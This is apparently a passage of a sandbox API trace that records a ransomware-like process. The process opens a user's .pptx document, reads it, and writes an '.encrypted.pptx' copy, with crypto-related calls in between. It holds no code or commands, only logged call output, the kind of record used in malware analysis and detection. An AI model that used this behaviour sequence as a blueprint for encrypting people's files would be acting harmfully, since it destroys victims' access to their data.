PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.662] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.662] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.662] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.662] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.662] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0032.662] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.662] CryptDestroyHash (hHash=0x7c2100) returned 1 [0032.662] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.662] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.663] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.663] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.663] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.663] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5rjt0hce.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0032.663] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.663] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0032.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0032.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0032.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0032.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0032.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0032.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0032.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0032.663] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0032.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0032.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0032.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0032.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0032.663] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0032.663] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0032.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0032.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0032.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0032.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0032.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0032.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0032.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0032.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0032.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0032.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0032.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0032.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0032.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0032.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0032.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0032.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0032.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0032.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0032.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0032.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0032.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0032.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0032.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0032.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0032.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0032.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0032.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0032.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0032.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0032.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0032.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0032.665] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0032.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0032.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0032.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0032.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0032.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0032.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.666] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.encrypted.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5rjt0hce.encrypted.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0032.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0032.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0032.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0032.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0032.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0032.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0032.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0032.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0032.667] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0032.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0032.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0032.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0032.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0032.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0032.667] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0032.667] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0032.667] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0032.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0032.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0032.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0032.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0032.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0032.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0032.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0032.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0032.668] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0032.668] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0032.670] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x27e9, lpOverlapped=0x0) returned 1 [0032.670] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0032.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0032.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0032.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x127e9) returned 0x955018 [0032.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0032.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0032.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0032.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0032.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0032.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0032.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x127e9) returned 0x967810 [0032.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0032.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.673] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0032.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0032.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0032.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x127e9) returned 0x955018 [0032.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0032.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0032.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0032.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.673] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0032.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0032.673] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0032.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.674] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0032.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0032.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0032.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0032.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0032.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0032.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0032.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x127e9) returned 0x955018 [0032.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0032.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0032.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da348 [0032.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0032.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0032.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0032.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da378 [0032.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0032.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0032.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0032.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce38 [0032.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0032.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0032.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0032.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0032.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x127e9) returned 0x88ffb0 [0032.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0032.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0032.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0032.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0032.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0032.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0032.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0032.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0032.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0032.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0032.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0032.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0032.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0032.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0032.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0032.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0032.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0032.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0032.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0032.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0032.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0032.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0032.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0032.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0032.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0032.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0032.677] RtlAllocateHeap 